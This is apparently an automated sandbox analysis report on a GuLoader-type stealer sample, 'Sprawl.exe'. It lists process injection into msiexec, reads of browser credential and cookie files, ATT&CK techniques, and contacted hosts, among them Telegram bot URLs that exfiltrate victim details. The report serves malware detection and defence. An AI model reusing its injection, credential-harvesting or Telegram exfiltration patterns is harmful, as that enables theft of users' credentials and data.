            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\Sprawl.exeAPI call chain: ExitProcess graph end nodegraph_0-3247
            Source: C:\Users\user\Desktop\Sprawl.exeAPI call chain: ExitProcess graph end nodegraph_0-3400
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75892B rdtsc 2_2_0B75892B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D2DE58 LdrInitializeThunk,2_2_04D2DE58
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB6B mov edx, dword ptr fs:[00000030h]2_2_0B78EB6B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB63 mov edx, dword ptr fs:[00000030h]2_2_0B78EB63
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB53 mov edx, dword ptr fs:[00000030h]2_2_0B78EB53
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB4B mov edx, dword ptr fs:[00000030h]2_2_0B78EB4B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB43 mov edx, dword ptr fs:[00000030h]2_2_0B78EB43
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB3B mov edx, dword ptr fs:[00000030h]2_2_0B78EB3B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EABC mov edx, dword ptr fs:[00000030h]2_2_0B78EABC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78BFF9 mov eax, dword ptr fs:[00000030h]2_2_0B78BFF9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EE66 mov ebx, dword ptr fs:[00000030h]2_2_0B78EE66
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED70 mov eax, dword ptr fs:[00000030h]2_2_0B78ED70
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78B065 mov eax, dword ptr fs:[00000030h]2_2_0B78B065
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C006 mov eax, dword ptr fs:[00000030h]2_2_0B78C006
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75BA18 mov ebx, dword ptr fs:[00000030h]2_2_0B75BA18
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B7642E3 mov eax, dword ptr fs:[00000030h]2_2_0B7642E3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75BF19 mov eax, dword ptr fs:[00000030h]2_2_0B75BF19
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B41F mov eax, dword ptr fs:[00000030h]2_2_0B75B41F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 44C0000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll | VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\SysWOW64\msiexec.exe | VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll | VolumeInformation
Source: C:\Users\user\Desktop\Sprawl.exe | Code function: GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA | 0_2_00405D51

Stealing of Sensitive Information

Source: Yara match | File source: 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 4460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 3212, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Remote Access Functionality

Source: Yara match | File source: 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 4460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 3212, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; a leading number is the report's match-count badge for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Windows Management Instrumentation; 2 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 311 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 311 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 2 File and Directory Discovery; 15 System Information Discovery; 111 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Web Service; 3 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 24 Application Layer Protocol; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1539387 | Sample: Sprawl.exe | Start date: 22/10/2024 | Architecture: WINDOWS | Score: 100

Sample-level network: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 5 other IPs or domains
Sample-level signatures: Found malware configuration; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 4 other signatures

Process tree:
Sprawl.exe
  dropped: C:\Users\user\AppData\...\Paraffinerer.Dej (ASCII)
  signatures: Suspicious powershell command line found
  +- powershell.exe
       dropped: C:\Users\user\AppData\Roaming\...\Sprawl.exe (PE32); C:\Users\user\...\Sprawl.exe:Zone.Identifier (ASCII)
       signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 2 other signatures
       +- msiexec.exe
            network: api.telegram.org 149.154.167.220 (ports 443, 50023, 50025; TELEGRAMRU, United Kingdom); smtp.ionos.es 213.165.67.102 (ports 50027, 50028, 587; ONEANDONE-ASBrauerstrasse48DE, Germany); 3 other IPs or domains
       +- conhost.exe
  +- powershell.exe
       signatures: Loading BitLocker PowerShell Module
       +- msiexec.exe
            network: drive.google.com 142.250.184.238 (ports 443, 49986, 49987; GOOGLEUS, United States)
            signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
       +- conhost.exe

Antivirus detection (submitted file)
Source | Detection | Scanner | Label
Sprawl.exe | 42% | ReversingLabs | Win32.Trojan.Guloader

Antivirus detection (dropped file)
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exe | 42% | ReversingLabs | Win32.Trojan.Guloader

No Antivirus matches
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.184.238 | true | false | - | unknown
drive.usercontent.google.com | 142.250.185.65 | true | false | - | unknown
reallyfreegeoip.org | 188.114.97.3 | true | true | - | unknown
smtp.ionos.es | 213.165.67.102 | true | true | - | unknown
api.telegram.org | 149.154.167.220 | true | true | - | unknown
checkip.dyndns.com | 193.122.6.168 | true | false | - | unknown
checkip.dyndns.org | unknown | unknown | true | - | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | - | unknown
https://reallyfreegeoip.org/xml/173.254.250.76 | false | - | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | - | unknown
                                NameSourceMaliciousAntivirus DetectionReputation
